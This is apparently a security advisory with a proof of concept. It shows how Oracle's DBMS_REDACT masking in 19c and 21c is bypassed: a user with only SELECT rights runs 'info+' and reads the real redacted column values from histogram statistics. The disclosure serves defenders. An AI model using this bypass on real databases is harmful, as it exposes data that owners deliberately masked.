Authored by Emad Al-Mousa

Proof of concept overview on how the DBMS_REDACT Dynamic Data Masking security feature in Oracle can be bypassed. Affected versions include 19c and 21c.

Title: ByPassing DBMS_REDACT Dynamic Data Masking security feature in Oracle database system
Product: Database
Manufacturer: Oracle
Affected Version(s): 19c,21c
Tested Version(s): 19c,21c
CVE Reference: N/A
Author of Advisory: Emad Al-Mousa

Overview:

DBMS_REDACT package provides an interface to Oracle Data Redaction, which enables you to mask (redact) data that is returned from SQL queries. Basically, its dynamic data masking. security policies are configured and enabled through dbms_redact package.

This is a security feature but doesn't provide a bullet proof data protection, as I will simulate how easily it can be bypassed and masked datacan be extracted/viewed.

**************************************************
Proof of Concept (PoC):
In the database I will create a table called HR.TABLE2 and will create an index on SALES column and insert dummy tables.

SQL> CREATE TABLE HR.TABLE2( COMPANY_NAME VARCHAR2(10 BYTE), REGION VARCHAR2(10 BYTE), SALES NUMBER(12), DIVISION_NAME VARCHAR2(12));
SQL> CREATE INDEX HR.IDX_TABLE2_SALES ON HR.TABLE2(SALES);

SQL> Insert into HR.TABLE2 values ('COMPANY_A','EU',120000000,'INDUSTRIAL');
SQL> Insert into HR.TABLE2 values ('COMPANY_B','ASIA',170000000,'RETAIL');
SQL> Insert into HR.TABLE2 values ('COMPANY_C','ME',40000000,'SHIPMENT');
SQL> Insert into HR.TABLE2 values ('COMPANY_D','AFRICA',11000000,'FARMING');
SQL> Insert into HR.TABLE2 values ('COMPANY_E','LATIN-AM',114000000,'SHIPMENT');
SQL> Insert into HR.TABLE2 values ('COMPANY_F','NORTH-AM',190000000,'RETAIL');
SQL> commit;

I will create a redaction policy as SYS user against “SALES” column in the table HR.TABLE2:
sqlplus / as sysdba
SQL> begin dbms_redact.add_policy( object_schema => 'HR', object_name => 'TABLE2', column_name => 'SALES', policy_name => 'REDACT_HR_SALES', function_type => DBMS_REDACT.FULL, expression => '1=1'); end;/

I will create a user called "roro" in the pluggable database ORCLPDB1 with “create session” and "SELECT" permission ONLY on the table:
sqlplus / as sysdba
SQL> alter session set container=ORCLPDB1;SQL> create user roro identified by dummy_123;SQL> grant select on HR.TABLE2 to roro;

connecting using account roro to the database using "SQL Developer Tool" or SQLCL and execute the following command:
info+ HR.TABLE2;

The histogram data for SALES column will show the actual vaules stored in the redacted column.
Conclusion: So the security feature was bypassed with no excessive privileges required to be granted to the database account, I utilized the info+ command only.

**************************************************
References:
https://docs.oracle.com/database/121/ASOAG/introduction-to-oracle-data-redaction.htm#ASOAG852
https://databasesecurityninja.wordpress.com/2023/01/03/bypassing-dbms_redact-dynamic-data-masking-security-feature-in-oracle-database-system/

Thanks,Emad